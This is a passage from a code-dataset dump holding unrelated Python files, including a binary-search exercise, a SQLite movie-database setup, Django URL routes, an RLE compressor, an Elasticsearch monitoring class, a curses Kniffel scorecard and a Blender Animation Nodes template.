function_decorator\n","repo_name":"bramvanwersch/Machine_mining","sub_path":"python_code/utility/game_timing.py","file_name":"game_timing.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1950997108","text":"# 파라메트릭서치인 이유?\n# 1) 막걸리 용량 : 2^31 -1\n# 2) 최대키워드\nimport sys\nsi = sys.stdin.readline\nn, k = map(int, si().split())\narr = [int(input()) for i in range(n)]\n\n\ndef determine(capacity):\n #k명에게 막걸리 분배하는 로직\n cnt = 0\n for x in arr:\n cnt += (x // capacity) #몇명한테 나눠줄 수 있는 지구하기\n return k <= cnt \n \n\n#구하고자 하는 값 : 최대한 많은양의 막걸리를 분배할 수 있는 용량\n#막걸리를 남으면 버린다.\ns, e, answer = 0, (1 << 31) - 1, 0\nwhile s <= e:\n mid = (s + e) // 2\n if mid == 0:\n answer = 0\n break\n if determine(mid):\n #막걸리가 분배가 된다는 것은 양이 낮다는의미이다.\n s = mid + 1\n answer = mid\n else:\n e = mid - 1\nprint(answer)","repo_name":"JongPyoAhn/Python","sub_path":"코딩테스트/이분탐색/파라미터서치/이상한 술집.py","file_name":"이상한 술집.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69934978492","text":"import sqlite3\nimport tkinter as tk\nfrom tkinter import messagebox as msg\n\n\n# !!!!!!!!!!!!!!!!!!!!!!!!\n# If you have Movies.db, do not run this code.\n# The original Movies.db has some film datas.\n# This code is for resetting the database.\n# !!!!!!!!!!!!!!!!!!!!!!!!\n\n\n\ndef get_db_connection():\n return sqlite3.connect(\"movies.db\")\n\n\ndef create_db_table():\n try:\n conn = get_db_connection()\n cur = conn.cursor()\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS User (\n uid INTEGER PRIMARY KEY AUTOINCREMENT,\n userName TEXT,\n userPassword TEXT\n\n );\n \"\"\")\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS Directors (\n d_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n d_name TEXT \n );\"\"\")\n\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS Films(\n film_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n tr_title TEXT,\n en_title TEXT,\n tr_desc TEXT,\n en_desc TEXT,\n image BLOB,\n imdb NUMERIC,\n d_ID INTEGER,\n year INTEGER\n\n );\"\"\")\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS Actors(\n actor_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n actor_name TEXT\n\n );\"\"\")\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS FilmActor(\n actor_ID INTEGER,\n film_ID INTEGER\n\n );\n \"\"\")\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS Categories(\n c_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n c_trName TEXT,\n c_enName TEXT\n\n );\n \"\"\")\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS FilmCategory (\n c_ID INTEGER,\n film_ID INTEGER\n\n );\"\"\")\n '''\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS Directors(\n d_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n d_name TEXT \n );\n\n CREATE TABLE IF NOT EXISTS Films (\n film_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n tr_title TEXT,\n en_title TEXT,\n tr_desc TEXT,\n en_desc TEXT,\n image BLOB,\n imdb NUMERIC,\n d_ID INTEGER\n\n );\n CREATE TABLE IF NOT EXISTS Actors (\n actor_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n actor_name TEXT\n\n );\n\n CREATE TABLE IF NOT EXISTS FilmActor(\n actor_ID INTEGER ,\n film_ID INTEGER\n\n );\n\n CREATE TABLE IF NOT EXISTS Categories(\n c_ID INTEGER PRIMARY KEY AUTOINCREMENT,\n c_trName TEXT,\n c_enName TEXT\n\n );\n\n CREATE TABLE IF NOT EXISTS FilmCategory (\n c_ID INTEGER,\n film_ID INTEGER\n\n );\n\n \"\"\")\n '''\n conn.commit()\n conn.close()\n msg.showinfo(\"Setup Database\", \"Database table created.\")\n except Exception as exc:\n msg.showerror(\"Error\", \"Error: \" + str(exc))\n\n\ncreate_db_table()\n\n\ndef insert_category_table(tr, en):\n try:\n conn = get_db_connection()\n cur = conn.cursor()\n cur.execute(\"INSERT INTO Categories (c_trName, c_enName) VALUES (:ctr,:cen)\",\n {\"ctr\": tr,\n \"cen\": en})\n conn.commit()\n conn.close()\n # msg.showinfo(\"Done\", \"Insert successful\")\n\n except Exception as exc:\n msg.showerror(\"Error\", \"Error: \" + str(exc))\n\n\ninsert_category_table(\"Aksiyon\", \"Action\")\ninsert_category_table(\"Animasyon\", \"Animation\")\ninsert_category_table(\"Korku\", \"Horror\")\ninsert_category_table(\"Komedi\", \"Comedy\")\ninsert_category_table(\"Suç\", \"Crime\")\ninsert_category_table(\"Dram\", \"Drama\")\ninsert_category_table(\"Macera\", \"Adventure\")\ninsert_category_table(\"Bilim-Kurgu\", \"Sci-Fi\")\ninsert_category_table(\"Gizem\", \"Mystery\")\ninsert_category_table(\"Romantik\", \"Romance\")\ninsert_category_table(\"Fantastik\", \"Fantasy\")\ninsert_category_table(\"Süper Kahraman\", \"Superhero\")\n","repo_name":"ilkerefeyavuz/FilmCatalogue","sub_path":"ReSetupDatabase.py","file_name":"ReSetupDatabase.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6297434623","text":"from django.urls import path, include\nfrom . import views\nurlpatterns = [\n path('', views.home_view, name= 'home_view'),\n path('login/', views.login_view, name='login_view'),\n # path('login/validate', views.login_validate, name='login_validate'),\n # path('logout/', views.logout, name='logout'),\n path('nav_list/', views.nav_list_view, name='nav_list_view'),\n path('product_detial/', views.product_detail_view, name='product_detail_view'),\n path('search/', views.search_view, name='search_view'),\n path('signup/', views.signup_view, name='signup_view'),\n # path('join/', views.join_page, name='join_page'),\n # path('edit/', views.edit_user_info, name='edit_user_info'),\n]\n","repo_name":"bongj9/h_d","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3708199331","text":"# 5 - Реализуйте RLE алгоритм: реализуйте модуль сжатия \n# и восстановления данных. Входные и выходные данные \n# хранятся в отдельных текстовых файлах.\n# файл первый:\n# AAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCDDDDDDEEEEEFFFFG python is sooooooo coooooool\n# файл второй:\n# сжатый текст.\nimport os\nos.system('cls')\n\ndef write_file(input_string: str):\n '''\n Записывает информацию в файл\n '''\n with open('RLE_input_data.txt', 'w', encoding ='utf-8') as file:\n file.write(input_string)\n \ndef RLE_encoding(string: str) -> str:\n '''\n Кодирует данные и записывает их в файл\n '''\n i = 0\n compressed = ''\n while i < len(string):\n count = 1\n while i + 1 < len(string) and string[i] == string[i + 1]:\n count = count + 1\n i = i + 1\n if count == 1: # это условие позволет избавиться от '1'\n compressed += string[i]\n i = i + 1\n else:\n compressed += str(count) + string[i]\n i = i + 1\n with open('RLE_output_data.txt', 'w', encoding ='utf-8') as file:\n file.write(compressed)\n return compressed\n\ndef data_decoding(encoding_data: str) -> str:\n '''\n Раскодирует данные и возвращает строку\n '''\n data = ''\n count = ''\n for char in encoding_data: \n if char.isdigit(): \n count += char \n else: \n if not count:\n count = 1\n data += char * int(count) \n count = '' \n return data\n\ninput_data = input('Введите данные: ')\nwrite_file(input_data)\ncompressed_data = RLE_encoding(input_data)\noutput_data = data_decoding(compressed_data)\nprint('Исходные данные ->', input_data)\nprint('Закодированные данные -> ', compressed_data)\nprint('Раскодировнные данные -> ', output_data)","repo_name":"AlexHall884/Home_Work_Python","sub_path":"Home_Work_04/Task_5.py","file_name":"Task_5.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12780235090","text":"import os\n\n\ndef isBinod(item):\n global allBinod\n with open(item) as f:\n binod = f.read()\n if \"binod\" in binod.lower():\n print(f\"Binod is found in {item}.\")\n allBinod += 1\n else:\n print(f\"No Binod in {item}.\")\n\n\nif __name__ == \"__main__\":\n allBinod = 0\n dir_contents = os.listdir()\n print(dir_contents)\n\n for item in dir_contents:\n if item.endswith(\"txt\"):\n isBinod(item)\n\n print(f\"We found a total of {allBinod} Binod.\")\n","repo_name":"AlzyWelzy/pythonPractice","sub_path":"problem-10.py","file_name":"problem-10.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40789278978","text":"# coding=utf-8\n# __author__ = 'shunchiguo'\n\nimport sys\nimport getopt\nimport math\nimport datetime\nfrom statistics import mean\nfrom elasticsearch import Elasticsearch\nfrom Logger import Logger\n\n\nclass CheckBase:\n\tdef __init__(self, app_name, method=\"\", warn_rate=0, error_rate=0, sample_time=15, sample_num=100,\n\t check_type=\"up\", index_name=\"quality_log\", app_ip=\"\",\n\t hosts=['192.168.30.65', '192.168.30.66', '192.168.30.67'], debug_time=None,\n\t http_url=\"\", http_method=\"\"):\n\t\tself.app_ip = app_ip\n\t\tself.app_name = app_name\n\t\tself.method = method\n\t\tself.warn_rate = warn_rate\n\t\tself.error_rate = error_rate\n\t\tself.sample_time = sample_time\n\t\tself.sample_num = sample_num\n\t\tself.hosts = hosts\n\t\tself.index_name = index_name\n\t\tself.check_type = check_type\n\t\tself.debug_time = debug_time\n\t\tself.http_url = http_url\n\t\tself.http_method = http_method\n\t\tself.es = Elasticsearch(hosts)\n\t\tLogger.debug(\"init config: index_name={}, app_ip={}, app_name={}, method={}, warn_rate={}, \\\nerror_rate={}, sample_time={}, sample_num={}, hosts={}\"\n\t\t .format(self.index_name, self.app_ip, self.app_name, self.method, self.warn_rate, self.error_rate,\n\t\t self.sample_time, self.sample_num, self.hosts))\n\n\tdef build_body(self, dt_begin, dt_end):\n\t\tbody = {\n\t\t\t\"query\": {\n\t\t\t\t\"and\": [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"term\": {\n\t\t\t\t\t\t\t\"app_name\": self.app_name\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"range\": {\n\t\t\t\t\t\t\t\"request_time\": {\n\t\t\t\t\t\t\t\t\"from\": dt_begin.strftime('%Y-%m-%d %H:%M:%S'),\n\t\t\t\t\t\t\t\t\"to\": dt_end.strftime('%Y-%m-%d %H:%M:%S'),\n\t\t\t\t\t\t\t\t\"time_zone\": \"+08:00\"\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t]\n\t\t\t}\n\t\t}\n\n\t\tif self.method != \"\":\n\t\t\tbody[\"query\"][\"and\"].append({\n\t\t\t\t\"term\": {\n\t\t\t\t\t\"call_method\": self.method\n\t\t\t\t}\n\t\t\t})\n\t\tif self.app_ip != \"\":\n\t\t\tbody[\"query\"][\"and\"].append({\n\t\t\t\t\"term\": {\n\t\t\t\t\t\"server_ip\": self.app_ip\n\t\t\t\t}\n\t\t\t})\n\n\t\tif self.http_method != \"\":\n\t\t\tbody[\"query\"][\"and\"].append({\n\t\t\t\t\"term\": {\n\t\t\t\t\t\"method\": self.http_method\n\t\t\t\t}\n\t\t\t})\n\n\t\tif self.http_url != \"\":\n\t\t\tbody[\"query\"][\"and\"].append({\n\t\t\t\t\"prefix\": {\n\t\t\t\t\t\"url\": self.http_url\n\t\t\t\t}\n\t\t\t})\n\t\t# print(body)\n\t\treturn body\n\n\tdef filter_error_data(self, avg_all, ary_pre):\n\t\tavg_total = 0\n\t\tavg_num = len(ary_pre)\n\t\tavg_rtn = avg_all\n\t\tif avg_num > 0:\n\t\t\t# 需要去除历史异常的数据,如:超量过高请求\n\t\t\tfor obj in ary_pre:\n\t\t\t\tavg_total += obj[\"average\"]\n\t\t\tavg_rtn = avg_total / float(avg_num)\n\n\t\t\t# 去除历史数据中的异常数据,取正常平均值\n\t\t\tfilter_percent = 0.9\n\t\t\tif avg_rtn > 5:\n\t\t\t\tfilter_percent = 1 / math.log2(avg_rtn)\n\t\t\tfilter_max = avg_rtn * (1 + filter_percent)\n\t\t\tfilter_min = avg_rtn * (1 - filter_percent)\n\t\t\tLogger.debug(\n\t\t\t\t\"total array average={:.2f}, filter_percent={:.2f} total number={}, filter_max={:.2f}, filter_min={:.2f}\"\n\t\t\t\t.format(avg_rtn, filter_percent, avg_num, filter_max, filter_min))\n\n\t\t\tary_min = []\n\t\t\tary_max = []\n\t\t\tary_mid = []\n\t\t\tfor obj in ary_pre:\n\t\t\t\tval = obj[\"average\"]\n\t\t\t\tLogger.debug(\"curr value:{:.2f}, max:{:.2f}, min:{:.2f}\".format(val, filter_max, filter_min))\n\t\t\t\tif val > filter_max:\n\t\t\t\t\tary_max.append(val)\n\t\t\t\t\tLogger.debug(\"ary_max push:{:.2f}\".format(val))\n\t\t\t\telif val < filter_min:\n\t\t\t\t\tary_min.append(val)\n\t\t\t\t\tLogger.debug(\"ary_min push:{:.2f}\".format(val))\n\t\t\t\telse:\n\t\t\t\t\tary_mid.append(val)\n\n\t\t\tavg_max = len(ary_max)\n\t\t\tavg_min = len(ary_min)\n\t\t\tavg_mid = len(ary_mid)\n\t\t\tLogger.debug(\"average range number:{}, overflow up number:{}, overflow down number:{}\"\n\t\t\t .format(avg_mid, avg_max, avg_min))\n\n\t\t\tif avg_mid != avg_num:\n\t\t\t\tif avg_mid > 0 and (avg_mid >= avg_max or avg_mid >= avg_min):\n\t\t\t\t\tavg_rtn = mean(ary_mid)\n\t\t\t\t\tLogger.debug(\"process average data, length:{:.2f}, average:{}\".format(avg_rtn, avg_mid))\n\t\t\t\telse:\n\t\t\t\t\tif avg_max > avg_min:\n\t\t\t\t\t\tavg_rtn = mean(ary_max)\n\t\t\t\t\t\tLogger.debug(\"process overflow data, length:{:.2f}, average:{}\".format(avg_rtn, avg_max))\n\t\t\t\t\telse:\n\t\t\t\t\t\tavg_rtn = mean(ary_min)\n\t\t\t\t\t\tLogger.debug(\"process lower data, length:{:.2f}, average:{}\".format(avg_rtn, avg_min))\n\t\treturn avg_rtn\n\n\ndef get_class(kls):\n\tparts = kls.split('.')\n\tmodule = \".\".join(parts[:-1])\n\tcall_model = __import__(module)\n\tfor comp in parts[1:]:\n\t\tcall_model = getattr(call_model, comp)\n\treturn call_model\n\n\ndef run_app(class_name, usage):\n\tLogger.init()\n\tLogger.set_debug(False)\n\topts, args = getopt.getopt(sys.argv[1:], \"hda:m:w:e:t:n:s:c:i:g:o:u:\")\n\t_index_name = \"quality_log\"\n\t_app_ip = \"\"\n\t_app_name = \"\"\n\t_method = \"\"\n\t_warn_rate = 0\n\t_error_rate = 0\n\t_sample_time = 0\n\t_sample_num = 0\n\t_check_type = \"\"\n\t_hosts = ['192.168.30.65', '192.168.30.66', '192.168.30.67']\n\t_debug_time = None\n\t_http_method = \"\"\n\t_http_url = \"\"\n\tfor op, value in opts:\n\t\tif op == \"-w\":\n\t\t\t_warn_rate = float(value)\n\t\telif op == \"-i\":\n\t\t\t_app_ip = value\n\t\telif op == \"-a\":\n\t\t\t_app_name = value\n\t\telif op == \"-m\":\n\t\t\t_method = value\n\t\telif op == \"-c\":\n\t\t\t_check_type = value\n\t\telif op == \"-e\":\n\t\t\t_error_rate = float(value)\n\t\telif op == \"-t\":\n\t\t\t_sample_time = int(value)\n\t\telif op == \"-n\":\n\t\t\t_sample_num = int(value)\n\t\telif op == \"-s\":\n\t\t\t_hosts = value.split(',')\n\t\telif op == \"-d\":\n\t\t\tLogger.set_debug(True)\n\t\telif op == \"-g\":\n\t\t\t_debug_time = datetime.datetime.strptime(value, '%Y-%m-%d %H:%M:%S')\n\t\telif op == \"-u\":\n\t\t\t_http_url = value\n\t\telif op == \"-o\":\n\t\t\t_http_method = value\n\t\telif op == \"-h\":\n\t\t\tusage()\n\t\t\tsys.exit(2)\n\n\tclass_attr = get_class(class_name)\n\tm = class_attr(app_name=_app_name, method=_method, warn_rate=_warn_rate, error_rate=_error_rate,\n\t sample_time=_sample_time, sample_num=_sample_num, index_name=_index_name,\n\t check_type=_check_type, app_ip=_app_ip, hosts=_hosts, debug_time=_debug_time,\n\t http_url=_http_url, http_method=_http_method)\n\trtn = m.run()\n\tLogger.debug(\"check return is:{}\".format(rtn))\n\treturn rtn\n\n\nif __name__ == \"__main__\":\n\tm = get_class(\"check_throughput.CheckTP\")\n\tprint(m)\n","repo_name":"mendylee/quality-monitor","sub_path":"es_helper/check_base.py","file_name":"check_base.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41078139315","text":"\"\"\"\nThis modul contains the needed functionality for rendering a game-card into a window\n\"\"\"\nimport curses\nfrom typing import List\n\nfrom kniffel.windows.game_window import players_card\n\nfrom kniffel import common\nfrom kniffel.data_objects.point import Point\n\n\nclass ResultCard:\n \"\"\"\n The ResultCard takes in a window it will render a result card\n \"\"\"\n\n def __init__(self, window: curses.window):\n self.__window = window\n\n @staticmethod\n def get_required_size():\n \"\"\"\n Return height and width needed for rendering a result card\n @return height, width\n \"\"\"\n return len(common.RESULT_PAD), len(common.RESULT_PAD[0])\n\n @staticmethod\n def get_control_string() -> str:\n \"\"\"\n Returns the control-string with all available controls for the result card\n \"\"\"\n return common.LABEL_CONTROL_DESCRIPTION_RESULT_CARD\n\n def render(self, points: List[List[Point]]):\n \"\"\"\n Renders the passed List[List[Point]] to the window passed in the constructor\n @param points: List[List[Point]] which is rendered\n \"\"\"\n self.__window.clear()\n\n max_y, max_x = self.__window.getmaxyx()\n x_off = (max_x - len(common.RESULT_PAD[0])) // 2\n y_off = (max_y - len(common.RESULT_PAD)) // 2\n\n # Print header pad\n players_card.draw_header(self.__window, y_off, x_off)\n\n # Print result card\n count = 0\n for line in common.RESULT_PAD:\n self.__window.addstr(\n count + y_off + len(common.NAME_PAD),\n x_off, line, curses.color_pair(\n common.COLOR_PAIR_BLACK_WHITE))\n count += 1\n\n count = 0\n for column in points:\n y_off_column = y_off + len(common.NAME_PAD) + 1\n x_off_column = x_off + len(common.RESULT_PAD[1]) + count * 6\n self.__window.move(y_off_column, x_off_column)\n self.__render_column(column)\n count += 1\n\n self.__window.refresh()\n\n def __render_column(self, column: List[Point]):\n \"\"\"\n Draws column at the current curser-position on the window\n @param column: column which is rendered\n \"\"\"\n y_off, x_off = self.__window.getyx()\n result_points = [0, 0, 0, 0]\n top_points = range(0, 6)\n all_top_points = range(0, 13)\n\n index: int = 0\n for point in column:\n if index in top_points:\n result_points[0] += point.value\n if result_points[0] >= 63:\n result_points[1] = 35\n if index in all_top_points:\n result_points[2] += point.value\n result_points[3] = result_points[1] + result_points[2]\n index += 1\n\n count: int = 0\n color=curses.color_pair(common.COLOR_PAIR_BLACK_WHITE)\n for result_card_line in common.RESULT_POINTS_PAD:\n if count % 2 == 0:\n index = count // 2\n point = result_points[index]\n\n str_to_add = result_card_line.format(point).center(5)\n\n self.__window.addstr(\n y_off + count,\n x_off,\n str_to_add.center(5),\n color)\n else:\n str_to_add = result_card_line\n self.__window.addstr(\n y_off + count,\n x_off,\n str_to_add,\n color\n )\n\n count += 1\n\n self.__window.addstr(\n \"!\",color)\n\n self.__window.refresh()\n","repo_name":"SaiCode-DEV/Python-Kniffel","sub_path":"kniffel/windows/game_window/result_card.py","file_name":"result_card.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39160440936","text":"from sklearn.linear_model import LinearRegression\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n \n\ndef thermometer(x, start, end):\n thresholds = np.arange(start, end)\n thermo = (x > thresholds).astype(float)\n thermo[np.arange(len(x)),\n (np.floor((x - start))).astype(int).reshape(len(x))\n ] = np.fmod(x, 1.0).reshape(len(x))\n return thermo\n\nX = np.random.uniform(0, 10, size=(50, 1))\nX = np.sort(X, axis=0)\nX_val = np.random.uniform(0, 10, size=(50, 1))\nX_val = np.sort(X_val, axis=0)\n\nX_thermo = thermometer(X, 0, 10)\nX_thermo_val = thermometer(X_val, 0, 10)\n\ny = np.square(X) + 5.0\ny_val = np.square(X_val) + 5.0\n\nlr = LinearRegression()\nlr.fit(X, y)\nprint(lr.score(X_val, y_val))\n\nlr2 = LinearRegression()\nlr2.fit(X_thermo, y)\nprint(lr2.score(X_thermo_val, y_val))\n\nplt.plot(X_val, lr.predict(X_val), label='Raw Feature')\nplt.plot(X_val, lr2.predict(X_thermo_val),label='Thermometer Encoding')\nplt.plot(X_val, y_val,'ro', label='Ground Truth')\nplt.legend()\nplt.savefig('../figures/thermo.pdf')","repo_name":"common-ai/ml-guide","sub_path":"src/thermometer.py","file_name":"thermometer.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"37248316382","text":"from django.urls import path\n\nfrom .views import (\n ReceiveList, ReceiveCreate, ReceiveUpdate, ReceiveDelete, ReceiveSearch,\n OrganizationList, OrganizationCreate, OrganizationUpdate, OrganizationDelete,\n PaymentList, PaymentCreate, PaymentUpdate, PaymentDelete, PaymentSearch,\n ActivityList, ActivityCreate, ActivityUpdate, ActivityDelete, ActivitySearch\n)\n\n\napp_name = \"government_accounts\"\n\nurlpatterns = [\n path('receives/', ReceiveList.as_view(), name=\"receives\"),\n path('receives/page/<int:page>', ReceiveList.as_view(), name=\"receives\"),\n path('receives/search', ReceiveSearch.as_view(), name=\"receives_search\"),\n path('receives/search/page/<int:page>', ReceiveSearch.as_view(), name=\"receives_search\"),\n path('receives/create', ReceiveCreate.as_view(), name=\"receive_create\"),\n path('receives/update/<int:pk>', ReceiveUpdate.as_view(), name=\"receive_update\"),\n path('receives/delete/<int:pk>', ReceiveDelete.as_view(), name=\"receive_delete\"),\n \n path('organizations/', OrganizationList.as_view(), name=\"organizations\"),\n path('organizations/create', OrganizationCreate.as_view(), name=\"organization_create\"),\n path('organizations/update/<int:pk>', OrganizationUpdate.as_view(), name=\"organization_update\"),\n path('organizations/delete/<int:pk>', OrganizationDelete.as_view(), name=\"organization_delete\"),\n\n path('payments/', PaymentList.as_view(), name=\"payments\"),\n path('payments/page/<int:page>', PaymentList.as_view(), name=\"payments\"),\n path('payments/search', PaymentSearch.as_view(), name=\"payments_search\"),\n path('payments/search/page/<int:page>', PaymentSearch.as_view(), name=\"payments_search\"),\n path('payments/create', PaymentCreate.as_view(), name=\"payment_create\"),\n path('payments/update/<int:pk>', PaymentUpdate.as_view(), name=\"payment_update\"),\n path('payments/delete/<int:pk>', PaymentDelete.as_view(), name=\"payment_delete\"),\n\n path('activities/', ActivityList.as_view(), name=\"activities\"),\n path('activities/page/<int:page>', ActivityList.as_view(), name=\"activities\"),\n path('activities/search', ActivitySearch.as_view(), name=\"activities_search\"),\n path('activities/search/page/<int:page>', ActivitySearch.as_view(), name=\"activities_search\"),\n path('activities/create', ActivityCreate.as_view(), name=\"activity_create\"),\n path('activities/update/<int:pk>', ActivityUpdate.as_view(), name=\"activity_update\"),\n path('activities/delete/<int:pk>', ActivityDelete.as_view(), name=\"activity_delete\"),\n]\n","repo_name":"EhsanGh69/paydar_projects","sub_path":"government_accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"35509083431","text":"import bpy\nfrom ... base_types.template import Template\n\nclass FCurveAnimationOffsetTemplate(bpy.types.Operator, Template):\n bl_idname = \"an.fcurve_animation_offset_template\"\n bl_label = \"FCurve Animation Offset\"\n nodeOffset = (-500, 200)\n\n def insert(self):\n\n # Nodes\n ####################################################################\n\n # Main Unit\n sourceObjectNode = self.newNode('an_DataInputNode', x = 0, y = 0, label = 'Source Object')\n sourceObjectNode.assignedType = 'Object'\n\n timeInfoNode = self.newNode('an_TimeInfoNode', x = 0, y = -200)\n additionalOffsetNode = self.newNode('an_TranslationMatrixNode', x = 0, y = -325)\n additionalOffsetNode.inputs[0].value = [4, 3, 0]\n individualOffsetNode = self.newNode('an_ComposeMatrixNode', x = 220, y = -325)\n individualOffsetNode.inputs[0].value = [3, 0, 0]\n delayTimeNode = self.newNode('an_DelayTimeNode', x = 220, y = -200)\n objectInstancer = self.newNode('an_ObjectInstancerNode', x = 220, y = 150)\n objectInstancer.copyObjectProperties = True\n objectInstancer.removeAnimationData = True\n objectInstancer.inputs[0].value = 5\n invokeAnimationOffsetNode = self.newNode('an_InvokeSubprogramNode', x = 500, y = -80)\n\n # Animation Offset Group\n\n animationOffsetGroupInputNode = self.newNode('an_GroupInputNode', x = 0, y = -845)\n animationOffsetGroupInputNode.subprogramName = \"FCurve Animation Offset\"\n animationOffsetGroupInputNode.newParameter('Object', name = 'Source')\n animationOffsetGroupInputNode.newParameter('Object List', name = 'Targets')\n animationOffsetGroupInputNode.newParameter('Float', name = 'Frame')\n animationOffsetGroupInputNode.newParameter('Float', name = 'Time Offset').value = 10\n animationOffsetGroupInputNode.newParameter('Matrix', name = 'Additional Offset')\n animationOffsetGroupInputNode.newParameter('Matrix', name = 'Individual Offset')\n\n fCurvesFromObjectNode = self.newNode('an_FCurvesFromObjectNode', x = 250, y = -775)\n invokeObjectLoopNode = self.newNode('an_InvokeSubprogramNode', x = 470, y = -745)\n\n animationOffsetGroupOutputNode = self.newNode('an_GroupOutputNode', x = 700, y = -745)\n animationOffsetGroupOutputNode.newReturn('Object List', name = 'Targets')\n\n # Object Loop\n\n objectLoopInputNode = self.newNode('an_LoopInputNode', x = 0, y = -1300)\n objectLoopInputNode.subprogramName = \"Object Loop\"\n objectLoopInputNode.newIterator('Object List', name = 'Target').loop.useAsOutput = True\n objectLoopInputNode.newParameter('Object', name = 'Source')\n objectLoopInputNode.newParameter('FCurve List', name = 'FCurve List')\n objectLoopInputNode.newParameter('Float', name = 'Frame')\n objectLoopInputNode.newParameter('Float', name = 'Time Offset')\n objectLoopInputNode.newParameter('Matrix', name = 'Additional Offset')\n objectLoopInputNode.newParameter('Matrix', name = 'Individual Offset')\n accumulatedTransformationSocket = objectLoopInputNode.newParameter('Matrix', name = 'Accumulated Transformation')\n accumulatedTransformationSocket.loop.useAsInput = False\n\n multiplyIndexAndOffsetNode = self.newNode('an_FloatMathNode', x = 350, y = -1200)\n subtractOffsetFromFrameNode = self.newNode('an_FloatMathNode', x = 550, y = -1200)\n subtractOffsetFromFrameNode.operation = \"SUBTRACT\"\n calculateAccumulatedMatrixNode = self.newNode('an_MatrixMathNode', x = 350, y = -1580)\n reassignAccumulatedMatrixNode = self.newNode('an_ReassignLoopParameterNode', x = 540, y = -1580)\n copyTransformsNode = self.newNode('an_CopyTransformsNode', x = 550, y = -1340)\n copyTransformsNode.width = 140\n invokeCopyFCurvesNode = self.newNode('an_InvokeSubprogramNode', x = 760, y = -1200)\n updateMatrixNode = self.newNode('an_UpdateObjectMatricesNode', x = 1030, y = -1330)\n localTransformNode = self.newNode('an_TransformObjectNode', x = 1230, y = -1370)\n localTransformNode.useCenter = True\n additionalTransformNode = self.newNode('an_TransformObjectNode', x = 1450, y = -1415)\n additionalTransformNode.useCenter = False\n\n # Copy FCurves Loop\n\n copyFCurvesLoopInput = self.newNode('an_LoopInputNode', x = 0, y = -1850)\n copyFCurvesLoopInput.subprogramName = \"Copy FCurves\"\n copyFCurvesLoopInput.newIterator('FCurve List', name = 'FCurve')\n copyFCurvesLoopInput.newParameter('Object', name = 'Object').loop.useAsOutput = True\n copyFCurvesLoopInput.newParameter('Float', name = 'Frame Offset')\n\n fCurveInfoNode = self.newNode('an_FCurveInfoNode', x = 300, y = -1850)\n evaluateFCurveNode = self.newNode('an_EvaluateFCurveNode', x = 300, y = -2000)\n evaluateFCurveNode.frameType = \"ABSOLUTE\"\n objectDataPathOutputNode = self.newNode('an_ObjectDataPathOutputNode', x = 550, y = -1910)\n\n self.updateSubprograms()\n\n invokeAnimationOffsetNode.subprogramIdentifier = animationOffsetGroupInputNode.identifier\n animationOffsetGroupOutputNode.groupInputIdentifier = animationOffsetGroupInputNode.identifier\n invokeObjectLoopNode.subprogramIdentifier = objectLoopInputNode.identifier\n reassignAccumulatedMatrixNode.loopInputIdentifier = objectLoopInputNode.identifier\n reassignAccumulatedMatrixNode.parameterIdentifier = accumulatedTransformationSocket.identifier\n invokeCopyFCurvesNode.subprogramIdentifier = copyFCurvesLoopInput.identifier\n\n self.updateSubprograms()\n\n\n # Links\n ####################################################################\n\n # Main Unit\n\n self.newLink(sourceObjectNode.outputs[0], objectInstancer.inputs[1])\n self.newLink(timeInfoNode.outputs[0], delayTimeNode.inputs[0])\n self.newLink(sourceObjectNode.outputs[0], invokeAnimationOffsetNode.inputs[0])\n self.newLink(objectInstancer.outputs[0], invokeAnimationOffsetNode.inputs[1])\n self.newLink(delayTimeNode.outputs[0], invokeAnimationOffsetNode.inputs[2])\n self.newLink(additionalOffsetNode.outputs[0], invokeAnimationOffsetNode.inputs[4])\n self.newLink(individualOffsetNode.outputs[0], invokeAnimationOffsetNode.inputs[5])\n\n # Animation Offset Group\n\n self.newLink(animationOffsetGroupInputNode.outputs[0], fCurvesFromObjectNode.inputs[0])\n 